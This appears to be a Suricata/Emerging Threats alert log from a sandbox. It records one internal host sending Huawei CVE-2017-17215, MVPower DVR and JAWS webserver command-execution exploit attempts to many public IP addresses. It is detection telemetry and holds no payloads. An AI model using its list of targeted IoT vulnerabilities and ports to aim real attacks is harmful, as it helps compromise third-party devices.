                            06/10/24-15:38:02.799993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342637215192.168.2.13156.125.121.243
                            06/10/24-15:38:00.255864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690437215192.168.2.13197.116.245.45
                            06/10/24-15:38:00.027008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237037215192.168.2.13197.218.185.191
                            06/10/24-15:37:59.987736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784237215192.168.2.1341.209.100.187
                            06/10/24-15:38:00.259448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867237215192.168.2.13197.171.135.28
                            06/10/24-15:38:02.085779TCP2025883ET EXPLOIT MVPower DVR Shell UCE5055680192.168.2.13158.99.97.254
                            06/10/24-15:38:02.201892TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5334280192.168.2.13103.245.46.205
                            06/10/24-15:38:02.694481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172837215192.168.2.13197.76.64.6
                            06/10/24-15:37:59.993727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334237215192.168.2.13197.218.247.171
                            06/10/24-15:38:00.004662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341437215192.168.2.13156.38.108.66
                            06/10/24-15:38:00.169848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529637215192.168.2.13156.209.45.106
                            06/10/24-15:38:02.861461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.13156.71.124.70
                            06/10/24-15:37:59.783784TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3921880192.168.2.139.203.151.161
                            06/10/24-15:38:02.176604TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4909680192.168.2.132.73.98.0
                            06/10/24-15:38:02.852405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495637215192.168.2.1341.155.99.209
                            06/10/24-15:38:02.806681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802837215192.168.2.13197.120.214.252
                            06/10/24-15:37:59.971341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725837215192.168.2.1341.170.34.101
                            06/10/24-15:38:02.908641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897037215192.168.2.13156.202.174.167
                            06/10/24-15:38:02.155523TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4874880192.168.2.13107.68.239.149
                            06/10/24-15:38:02.178978TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5247280192.168.2.13161.147.158.238
                            06/10/24-15:38:02.493155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631037215192.168.2.1341.252.62.74
                            06/10/24-15:37:59.935900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850837215192.168.2.13156.67.226.82
                            06/10/24-15:38:02.215181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3691680192.168.2.1370.93.199.15
                            06/10/24-15:38:00.231115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487237215192.168.2.1341.73.107.249
                            06/10/24-15:38:00.270070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326237215192.168.2.1341.249.87.250
                            06/10/24-15:38:02.842261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967637215192.168.2.13197.35.23.215
                            06/10/24-15:38:00.023435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678637215192.168.2.13197.59.140.99
                            06/10/24-15:37:59.779104TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5922080192.168.2.1332.111.100.187
                            06/10/24-15:37:59.871854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3903480192.168.2.13152.83.224.204
                            06/10/24-15:38:02.311647TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5476680192.168.2.1345.60.178.180
                            06/10/24-15:37:59.948996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210837215192.168.2.13197.215.149.213
                            06/10/24-15:38:00.268090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913237215192.168.2.13156.196.209.129
                            06/10/24-15:38:00.201993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446437215192.168.2.13197.63.251.49
                            06/10/24-15:38:00.206692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767637215192.168.2.1341.39.55.229
                            06/10/24-15:38:02.844763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589837215192.168.2.13197.40.65.61
                            06/10/24-15:38:02.506945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886037215192.168.2.1341.53.52.238
                            06/10/24-15:38:00.255183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5517037215192.168.2.13156.134.168.58
                            06/10/24-15:38:02.845835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859437215192.168.2.13156.142.47.5
                            06/10/24-15:38:02.191076TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3479480192.168.2.1392.104.254.49
                            06/10/24-15:38:02.727944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468437215192.168.2.1341.17.67.8
                            06/10/24-15:38:00.039203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664237215192.168.2.1341.205.70.44
                            06/10/24-15:38:02.793700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433637215192.168.2.13197.253.198.195
                            06/10/24-15:38:02.320455TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3668080192.168.2.13172.217.48.49
                            06/10/24-15:38:00.034176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3634837215192.168.2.1341.222.149.196
                            06/10/24-15:38:02.916548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015637215192.168.2.13156.113.136.169
                            06/10/24-15:38:02.801648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244037215192.168.2.13156.201.150.156
                            06/10/24-15:38:02.188584TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3847680192.168.2.13134.254.164.251
                            06/10/24-15:38:02.833196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646037215192.168.2.13156.146.144.209
                            06/10/24-15:38:02.781625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932237215192.168.2.13156.207.139.16
                            06/10/24-15:37:59.929860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379637215192.168.2.13156.205.253.53
                            06/10/24-15:37:59.776818TCP2025883ET EXPLOIT MVPower DVR Shell UCE5989880192.168.2.13213.227.25.210
                            06/10/24-15:37:59.962891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813837215192.168.2.13156.59.177.15
                            06/10/24-15:38:02.491767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928837215192.168.2.1341.172.90.182
                            06/10/24-15:38:00.222372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.1341.9.164.177
                            06/10/24-15:38:00.228570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.13197.100.180.103
                            06/10/24-15:38:02.310242TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4781880192.168.2.13144.255.245.3
                            06/10/24-15:37:59.745869TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3786280192.168.2.13203.54.242.166
                            06/10/24-15:38:02.738142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486637215192.168.2.13156.111.149.77
                            06/10/24-15:37:59.950533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896037215192.168.2.1341.86.126.31
                            06/10/24-15:38:02.140610TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4998680192.168.2.13110.111.139.8
                            06/10/24-15:38:00.009869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296637215192.168.2.1341.45.237.96
                            06/10/24-15:38:02.615090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287237215192.168.2.1341.51.65.173
                            06/10/24-15:38:00.232831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349437215192.168.2.13197.159.198.51
                            06/10/24-15:38:02.873305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562437215192.168.2.13197.190.134.35
                            06/10/24-15:38:02.816370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633037215192.168.2.1341.242.68.175
                            06/10/24-15:38:00.185349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022037215192.168.2.1341.94.153.112
                            06/10/24-15:38:02.567099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543837215192.168.2.13156.99.186.57
                            06/10/24-15:38:02.799993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342637215192.168.2.13156.125.121.243
                            06/10/24-15:38:02.087126TCP2025883ET EXPLOIT MVPower DVR Shell UCE3843280192.168.2.13112.146.51.255
                            06/10/24-15:38:02.260368TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3338880192.168.2.13195.102.40.110
                            06/10/24-15:38:00.036323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070237215192.168.2.13156.238.163.110
                            06/10/24-15:38:02.171505TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5940880192.168.2.139.60.185.133
                            06/10/24-15:38:02.722392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236837215192.168.2.1341.222.92.212
                            06/10/24-15:37:59.960374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603437215192.168.2.1341.66.186.65
                            06/10/24-15:38:02.163354TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4639480192.168.2.1387.161.152.180
                            06/10/24-15:38:00.265357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126837215192.168.2.1341.201.241.195
                            06/10/24-15:38:00.167791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970237215192.168.2.13156.123.237.221
                            06/10/24-15:38:02.256334TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5733280192.168.2.13169.89.191.129
                            06/10/24-15:38:02.098347TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4690480192.168.2.13169.8.129.214
                            06/10/24-15:38:02.783251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956237215192.168.2.13156.229.89.182
                            06/10/24-15:38:02.172737TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5084680192.168.2.13216.4.227.234
                            06/10/24-15:38:02.130779TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3891680192.168.2.13211.255.132.135
                            06/10/24-15:38:02.733766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.13197.67.106.155
                            06/10/24-15:38:00.187605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680637215192.168.2.13197.214.46.200
                            06/10/24-15:38:02.696885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635637215192.168.2.13197.110.23.1
                            06/10/24-15:37:59.860897TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5640080192.168.2.1376.87.100.69
                            06/10/24-15:38:02.083879TCP2025883ET EXPLOIT MVPower DVR Shell UCE4586680192.168.2.13181.113.46.125
                            06/10/24-15:37:59.924273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532237215192.168.2.1341.112.237.34
                            06/10/24-15:38:02.818643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005437215192.168.2.13197.80.0.140
                            06/10/24-15:38:00.256609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290637215192.168.2.13156.172.0.85
                            06/10/24-15:38:02.086431TCP2025883ET EXPLOIT MVPower DVR Shell UCE3503680192.168.2.1364.180.193.8
                            06/10/24-15:38:02.496645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458237215192.168.2.13197.62.0.215
                            06/10/24-15:38:00.208229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886437215192.168.2.13156.181.42.38
                            06/10/24-15:38:02.662261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949037215192.168.2.13197.173.181.199
                            06/10/24-15:38:02.263058TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3961680192.168.2.13121.118.217.183
                            06/10/24-15:38:02.489622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609037215192.168.2.1341.43.184.117
                            06/10/24-15:38:02.092323TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3808280192.168.2.1394.87.180.153
                            06/10/24-15:37:59.986004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301637215192.168.2.13156.32.124.85
                            06/10/24-15:38:00.032058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.13197.105.195.56
                            06/10/24-15:38:00.241407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919837215192.168.2.13156.178.159.128
                            06/10/24-15:37:59.836086TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4000480192.168.2.13184.225.110.223
                            06/10/24-15:38:00.220635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465437215192.168.2.13156.16.252.113
                            06/10/24-15:38:02.809845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462437215192.168.2.1341.205.156.248
                            06/10/24-15:37:59.858870TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3441080192.168.2.13178.116.76.220
                            06/10/24-15:38:00.180724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561637215192.168.2.1341.124.122.69
                            06/10/24-15:38:02.743038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657037215192.168.2.1341.43.111.177
                            06/10/24-15:38:02.771027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557037215192.168.2.13156.180.47.217
                            06/10/24-15:38:02.206271TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5721080192.168.2.13117.51.17.164
                            06/10/24-15:38:02.504277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538837215192.168.2.13197.86.241.113
                            06/10/24-15:37:59.854316TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4902280192.168.2.1380.246.211.214
                            06/10/24-15:38:00.199727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505837215192.168.2.1341.251.58.239
                            06/10/24-15:38:02.289047TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5513280192.168.2.13139.161.150.59
                            06/10/24-15:38:02.231760TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4342880192.168.2.1346.84.188.53
                            06/10/24-15:38:02.859446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573437215192.168.2.1341.119.169.82
                            06/10/24-15:38:02.796621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159037215192.168.2.13197.197.52.159
                            06/10/24-15:38:02.655152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812637215192.168.2.1341.138.83.212
                            06/10/24-15:38:02.910934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750437215192.168.2.13197.148.228.103
                            06/10/24-15:37:59.972189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154837215192.168.2.13197.33.14.33
                            06/10/24-15:38:02.849196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144037215192.168.2.13197.11.180.159
                            06/10/24-15:38:02.718331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142237215192.168.2.13197.19.66.134
                            06/10/24-15:38:00.262299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779637215192.168.2.13197.194.180.37
                            06/10/24-15:38:02.487616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816037215192.168.2.13156.76.237.97
                            06/10/24-15:38:02.807666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165437215192.168.2.13156.114.253.89
                            06/10/24-15:38:00.006377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557237215192.168.2.13197.67.118.32
                            06/10/24-15:37:59.952158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885037215192.168.2.1341.119.93.57
                            06/10/24-15:38:02.653727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880037215192.168.2.1341.58.235.129
                            06/10/24-15:37:59.982567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062037215192.168.2.1341.144.136.243
                            06/10/24-15:38:02.162192TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4727280192.168.2.13185.193.19.118
                            06/10/24-15:38:02.493155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631037215192.168.2.1341.252.62.74
                            06/10/24-15:38:00.243236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472437215192.168.2.1341.231.72.216
                            06/10/24-15:38:02.770031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578237215192.168.2.1341.101.121.169
                            06/10/24-15:38:00.011379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4389637215192.168.2.1341.186.220.178
                            06/10/24-15:38:02.806681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802837215192.168.2.13197.120.214.252
                            06/10/24-15:38:02.706858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402237215192.168.2.13156.142.125.129
                            06/10/24-15:38:02.906256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383637215192.168.2.1341.161.161.103
                            06/10/24-15:38:02.654413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411037215192.168.2.13197.149.108.206
                            06/10/24-15:38:02.856030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688837215192.168.2.1341.147.198.198
                            06/10/24-15:37:59.968821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.13156.27.221.22
                            06/10/24-15:38:02.750600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821637215192.168.2.1341.96.242.34
                            06/10/24-15:38:02.756024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.13156.165.101.234
                            06/10/24-15:38:02.811819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944237215192.168.2.13156.234.212.72
                            06/10/24-15:37:59.941715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128237215192.168.2.13156.97.36.34
                            06/10/24-15:38:02.924570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723437215192.168.2.13156.82.178.96
                            06/10/24-15:38:00.034890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474237215192.168.2.13156.230.39.62
                            06/10/24-15:38:02.205682TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4815080192.168.2.13174.173.190.249
                            06/10/24-15:38:02.679364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530837215192.168.2.1341.184.163.172
                            06/10/24-15:38:00.024876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965437215192.168.2.13197.98.178.183
                            06/10/24-15:38:00.238848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642837215192.168.2.13197.11.239.20
                            06/10/24-15:38:00.179963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454237215192.168.2.1341.167.61.202
                            06/10/24-15:38:00.242237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.1341.188.47.47
                            06/10/24-15:38:02.686166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268637215192.168.2.13156.141.138.41
                            06/10/24-15:38:02.861461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.13156.71.124.70
                            06/10/24-15:37:59.849795TCP2025883ET EXPLOIT MVPower DVR Shell UCE4962080192.168.2.13161.106.196.70
                            06/10/24-15:37:59.845254TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6092680192.168.2.1320.163.218.116
                            06/10/24-15:38:02.657974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.13197.63.49.202
                            06/10/24-15:38:00.229452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239037215192.168.2.13156.192.233.189
                            06/10/24-15:38:02.206841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4432280192.168.2.13212.209.139.234
                            06/10/24-15:38:00.032756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250637215192.168.2.13197.235.137.220
                            06/10/24-15:38:00.249566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987437215192.168.2.13156.167.167.199
                            06/10/24-15:38:02.784346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909837215192.168.2.13156.138.11.171
                            06/10/24-15:38:02.293187TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4863880192.168.2.1357.149.234.226
                            06/10/24-15:38:02.182601TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962680192.168.2.1387.245.32.151
                            06/10/24-15:38:02.872396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320237215192.168.2.13156.136.99.172
                            06/10/24-15:38:02.753767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297037215192.168.2.1341.102.226.8
                            06/10/24-15:38:02.874286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066637215192.168.2.13197.65.234.66
                            06/10/24-15:38:00.198882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070637215192.168.2.1341.229.216.231
                            06/10/24-15:38:02.125008TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4649480192.168.2.13212.223.13.135
                            06/10/24-15:38:02.326758TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5696080192.168.2.138.62.18.145
                            06/10/24-15:38:02.509844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956037215192.168.2.13197.146.88.253
                            06/10/24-15:37:59.997798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255637215192.168.2.1341.195.163.183
                            06/10/24-15:38:02.099010TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4380480192.168.2.13130.145.155.186
                            06/10/24-15:38:02.693449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3790837215192.168.2.13197.2.17.159
                            06/10/24-15:38:02.817519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056037215192.168.2.13197.136.229.6
                            06/10/24-15:38:00.190865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286237215192.168.2.1341.237.134.242
                            06/10/24-15:37:59.833827TCP2025883ET EXPLOIT MVPower DVR Shell UCE5149280192.168.2.13154.68.192.29
                            06/10/24-15:38:02.773931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046637215192.168.2.13156.151.233.250
                            06/10/24-15:37:59.956930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935437215192.168.2.1341.113.11.68
                            06/10/24-15:38:00.231115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487237215192.168.2.1341.73.107.249
                            06/10/24-15:38:02.905259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982237215192.168.2.13197.213.44.111
                            06/10/24-15:38:02.295761TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3702280192.168.2.1372.176.38.52
                            06/10/24-15:37:59.987736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784237215192.168.2.1341.209.100.187
                            06/10/24-15:38:02.766582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293637215192.168.2.13197.122.248.88
                            06/10/24-15:37:59.866129TCP2025883ET EXPLOIT MVPower DVR Shell UCE5201880192.168.2.1320.192.68.43
                            06/10/24-15:38:02.919148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464637215192.168.2.13197.188.36.80
                            06/10/24-15:37:59.953764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868437215192.168.2.13197.252.226.228
                            06/10/24-15:37:59.781384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3750680192.168.2.13115.165.178.143
                            06/10/24-15:37:59.940258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962637215192.168.2.13197.53.161.229
                            06/10/24-15:38:02.084446TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4370080192.168.2.138.145.15.147
                            06/10/24-15:37:59.806758TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4055680192.168.2.1384.162.2.5
                            06/10/24-15:37:59.951337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.13197.123.58.130
                            06/10/24-15:38:00.250289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806237215192.168.2.13197.241.255.243
                            06/10/24-15:38:02.091217TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5517880192.168.2.1375.148.35.4
                            06/10/24-15:38:00.204323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556437215192.168.2.1341.168.73.24
                            06/10/24-15:38:02.764373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325437215192.168.2.13156.81.150.33
                            06/10/24-15:38:02.853487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709837215192.168.2.13156.201.215.148
                            06/10/24-15:38:02.131522TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4274080192.168.2.13212.194.156.239
                            06/10/24-15:38:00.198032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454437215192.168.2.13197.181.198.133
